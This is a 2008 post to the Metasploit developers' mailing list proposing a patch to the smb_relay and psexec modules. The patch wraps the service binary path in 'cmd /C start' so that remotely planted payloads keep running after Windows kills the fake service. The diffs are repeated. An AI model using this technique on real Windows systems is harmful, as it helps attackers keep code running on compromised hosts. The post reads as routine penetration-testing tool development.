The problem with running payloads under smb_relay and psexec is that
Windows expects them to be services, which they aren't. Windows
expects services to respond to calls to start, stop, give a status,
etc, and none of the payloads obviously do that. Therefore, when we
start a service, Windows asks the application for a status; when it
doesn't get it, it terminates the application.
But the application does run for a few seconds, so the solution is to
simply invoke the application on its own rather than within a service.
Once that's done, the application will be running in memory as a
standalone and the fact that a service started it is not a problem.
At first, I thought this would require building a special launcher
application, but then I remembered windows already has one. Simply
change:
NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path
to:
NDR.wstring("cmd /C start %SYSTEMROOT%\\#{filename}") + # Binary Path
This invokes a command shell which executes the start command.
Windows immediately terminates the cmd shell and returns an error, but
it has already run "start 'payload'", invoking the app in its own
right.
The two main problems I see with this:
1) You now have somewhat of a trigger for IDS (creating services with
bin_paths starting with "cmd /C start" can't be common)
2) It still doesn't clean up after itself.
But, if you find this useful anyway, here are the patches:
--- smb_relay.rb.old 2008-07-02 17:03:16.000000000 +0000
+++ smb_relay.rb 2008-07-02 17:07:32.000000000 +0000
@@ -180,7 +180,7 @@
NDR.long(0x00000003) + # Start: Demand
NDR.long(0x00000000) + # Errors: Ignore
- NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path
+ NDR.wstring("cmd /C start %SYSTEMROOT%\\#{filename}") + #
Binary Path
NDR.long(0) + # LoadOrderGroup
NDR.long(0) + # Dependencies
NDR.long(0) + # Service Start
--- psexec.rb.old 2008-07-02 17:08:46.000000000 +0000
+++ psexec.rb 2008-07-02 17:09:14.000000000 +0000
@@ -164,7 +164,7 @@
NDR.long(0x00000003) + # Start: Demand
NDR.long(0x00000000) + # Errors: Ignore
- NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path
+ NDR.wstring("cmd /C start %SYSTEMROOT%\\#{filename}") +
# Binary Path
NDR.long(0) + # LoadOrderGroup
NDR.long(0) + # Dependencies
NDR.long(0) + # Service Start
--- psexec.rb.old 2008-07-02 17:08:46.000000000 +0000
+++ psexec.rb 2008-07-02 17:09:14.000000000 +0000
@@ -164,7 +164,7 @@
NDR.long(0x00000003) + # Start: Demand
NDR.long(0x00000000) + # Errors: Ignore
- NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path
+ NDR.wstring("cmd /C start %SYSTEMROOT%\\#{filename}") + # Binary Path
NDR.long(0) + # LoadOrderGroup
NDR.long(0) + # Dependencies
NDR.long(0) + # Service Start
--- smb_relay.rb.old 2008-07-02 17:03:16.000000000 +0000
+++ smb_relay.rb 2008-07-02 17:07:32.000000000 +0000
@@ -180,7 +180,7 @@
NDR.long(0x00000003) + # Start: Demand
NDR.long(0x00000000) + # Errors: Ignore
- NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path
+ NDR.wstring("cmd /C start %SYSTEMROOT%\\#{filename}") + # Binary Path
NDR.long(0) + # LoadOrderGroup
NDR.long(0) + # Dependencies
NDR.long(0) + # Service Start
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
